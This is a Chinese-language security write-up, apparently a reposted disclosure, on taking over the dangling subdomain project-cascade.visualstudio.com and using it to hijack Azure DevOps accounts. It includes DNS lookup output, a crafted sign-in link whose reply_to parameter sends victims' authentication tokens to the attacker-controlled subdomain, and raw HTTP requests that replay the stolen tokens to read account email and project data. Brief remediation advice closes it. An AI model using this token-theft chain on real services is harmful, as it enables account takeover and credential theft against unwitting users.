您好,登錄后才能下訂單哦!
這篇文章給大家介紹怎么通過域名劫持實現Azure DevOps賬戶劫持,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
當測試子域名劫持漏洞(subdomain takeover)時,通常需要明白利用劫持域名能做什么,其產生的實際危害和影響有多大。最近,作者就劫持了微軟開發者網站子域名project-cascade.visualstudio.com,并利用它實現了針對集成開發環境Azure DevOps賬戶的一鍵劫持。一起來看看。
通過自動化測試,我們發現了*.visualstudio.com的一個子域名-project-cascade.visualstudio.com,它的NS記錄指向了Azure DNS,但從lookup的解析結果來看,卻是被拒絕掉的(Refused):
dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns3-05.azure-dns.org status: [Refused]
dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns2-05.azure-dns.net status: [Refused]
dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns1-05.azure-dns.com status: [Refused]
dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns4-05.azure-dns.info status: [Refused]
從上述Refused狀態的lookup解析中可以看出,project-cascade.visualstudio.com本來是注冊指向Azure DNS的,但是,現在它在Azure DNS的注冊指向是空的了,也就是說,我們可以用手頭現有的Azure賬戶來注冊獲得(takeover)這個子域名,然后往其中創建任意的DNS記錄。注冊后的project-cascade.visualstudio.com狀態如下:
然后,往其中添加兩條解析記錄:
TXT Record - txt.project-cascade.visualstudio.com (附帶Azure DNS Zone Takeover POC的域名設置說明信息)
A Record - arec.project-cascade.visualstudio.com (添加到 由我們控制IP地址3.88.203.203的記錄)
用dig命令來查詢驗證一下:
$ dig txt txt.project-cascade.visualstudio.com @1.1.1.1 ...omitted for brevity... ;; ANSWER SECTION: txt.project-cascade.visualstudio.com. 10 IN TXT "Azure DNS Zone Takeover POC"
$ dig a arec.project-cascade.visualstudio.com @1.1.1.1 ...omitted for brevity... ;; ANSWER SECTION: arec.project-cascade.visualstudio.com. 2475 IN A 3.88.203.203
這樣看來,我們已經接管了project-cascade.visualstudio.com子域名了,那就來看看它可以產生的具體危害吧。
我們注意到,某些visualstudio.com下的子域會通過login.microsoftonline.com來進行一些身份校驗,就比如訪問域名app.vssps.visualstudio.com后,會產生以下跳轉到login.microsoftonline.com的一個動作:
https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90#ctx=eyJTaWduSW5Db29raWVEb21haW5zIjpbImh0dHBzOi8vbG9naW4ubWljcm8zb2Z0b25saW5lLmNvbSJdfQ2
之后就會跳轉到https://login.microsoftonline.com/...omitted...進行身份校驗。
上述跳轉校驗機制中最重要的兩個部份是:
https://app.vssps.visualstudio.com/_signin:
reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F
經過測試我們發現,該跳轉校驗機制中對域名的限制比較寬松,允許任意*.visualstudio.com子域來接收身份校驗token。為了驗證,我們構造了以下URL測試鏈接:
https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90
在該構造鏈接中,我們把原先的reply_to參數值更改為了我們控制的子域https%3A%2F%2Farec.project-cascade.visualstudio.com%2。訪問該鏈接后,一樣會跳轉到正常的microsoft live.com登錄界面,當然如果當前用戶是登錄后狀態,也一樣會在其中執行跳轉請求:
假設受害者訪問登錄了該鏈接,則在跳轉過程中會執行一個對我們控制域名arec.project-cascade.visualstudio.com的POST請求,如下:
POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1 Host: arec.vssps.visualstudio.com Cookie: ...omitted for brevity... id_token=<snip>&FedAuth=<snip>&FedAuth2=<snip>%2B
則在我們控制的域名端arec.project-cascade.visualstudio.com后臺,就會自動發起針對app.vsaex.visualstudio.com的一個POST請求,還會接收到受害者訪問app.vsaex.visualstudio.com的另一個身份校驗token信息,如下:
POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1 Host: arec.project-cascade.visualstudio.com Content-Length: 4634 Referer: https://arec.vssps.visualstudio.com/_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F Cookie: ...omitted for brevity... id_token=<snip>&FedAuth=<snip>&FedAuth2=<snip>
利用上述后續獲得的身份校驗token,我們可以發起針對vsaex.visualstudio.com, dev.azure.com and vssps.dev.azure.com等合法域名的身份驗證,形成有效登錄,實現對這些賬戶的身份劫持。如以劫持app.vsaex.visualstudio.com賬戶為例,攜帶上述竊取token發起身份校驗請求:
POST /_apis/WebPlatformAuth/SessionToken HTTP/1.1 Host: app.vsaex.visualstudio.com Connection: close Content-Length: 105 Origin: https://app.vsaex.visualstudio.com X-VSS-ReauthenticationAction: Suppress Content-Type: application/json Accept: application/json;api-version=6.0-preview.1;excludeUrls=true X-Requested-With: XMLHttpRequest ...omitted for brevity... Cookie: UserAuthentication=<snipped id_token>; FedAuth=<snipped FedAuth>; FedAuth2=<snipped> {"appId":"00000000-0000-0000-0000-000000000000","force":false,"tokenType":0,"namedTokenId":"Aex.Profile"}
之后,服務端會響應回另一個app.vsaex.visualstudio.com分配的用戶有效token:
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Length: 933 Content-Type: application/json; charset=utf-8; api-version=6.0-preview.1 ...omitted for brevity... {"appId":"00000000-0000-0000-0000-000000000000","token":"<snip>","tokenType":"session","validTo":"2020-05-12T06:45:47.2007474Z","namedTokenId":"Aex.Profile"}
利用該token,可以在app.vsaex.visualstudio.com中執行用戶郵件獲取,請求:
GET /_apis/User/User HTTP/1.1 Host: app.vsaex.visualstudio.com Connection: close X-TFS-FedAuthRedirect: Suppress X-VSS-ReauthenticationAction: Suppress X-Requested-With: XMLHttpRequest Accept-Language: en-US Authorization: Bearer <snip just recieved bearer token> Accept: application/json;api-version=6.0-preview.1;excludeUrls=true User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 X-TFS-Session: ab1e4b56-599c-4ab6-9f5e-756c486a0f2b Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Referer: https://app.vsaex.visualstudio.com/me?mkt=en-US Accept-Encoding: gzip, deflate
響應:
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 258 ...omitted for brevity... {"descriptor":"msa.NTg0Zjc4NDAtYzc5ZC03MWU0LWJkN2ItMDZhY2Y1N2Q2OTA1","displayName":"s","mail":"<account_email>","unconfirmedMail":null,"country":"AU","dateCreated":"2018-05-25T23:19:53.6843383+00:00","lastModified":"2019-01-06T15:43:50.2963651+00:00","revision":0}
同時,利用該竊取token,還能通過鏈接https://app.vsaex.visualstudio.com/me?mkt=en-US訪問用戶關聯在dev.azure.com上的一些開發項目:
且最終能訪問獲取到用戶托管在dev.azure.com上的項目資源。請求:
GET /seanyeoh/_usersSettings/keys?__rt=fps&__ver=2 HTTP/1.1 Host: dev.azure.com Connection: close x-tfs-fedauthredirect: Suppress Origin: https://dev.azure.com x-vss-reauthenticationaction: Suppress authorization: Bearer <snip> accept: application/json;api-version=5.0-preview.1;excludeUrls=true;enumsAsNumbers=true;msDateFormat=true;noArrayWrap=true User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
惡意攻擊者可以構造以下鏈接,發送給無意受害者,實現對受害者賬戶的一鍵點擊劫持:
https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90
在攻擊者獲得app.vsaex.visualstudio.com的訪問令牌后,即能完全劫持受害者的Azure DevOps環境賬戶。
此外,通過對project-cascade.visualstudio.com的劫持,還可以設置MX郵件轉發記錄,獲取*.project-cascade.visualstudio.com上的郵件數據,甚至是創建SSL證書,形成對Microsoft服務的欺詐假冒。
重新注冊域名project-cascade.visualstudio.com,獲得對其控制權
限制app.vssps.visualstudio.com中reply_to產生的token對域app.vsaex.visualstudio.com的訪問
關于怎么通過域名劫持實現Azure DevOps賬戶劫持就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。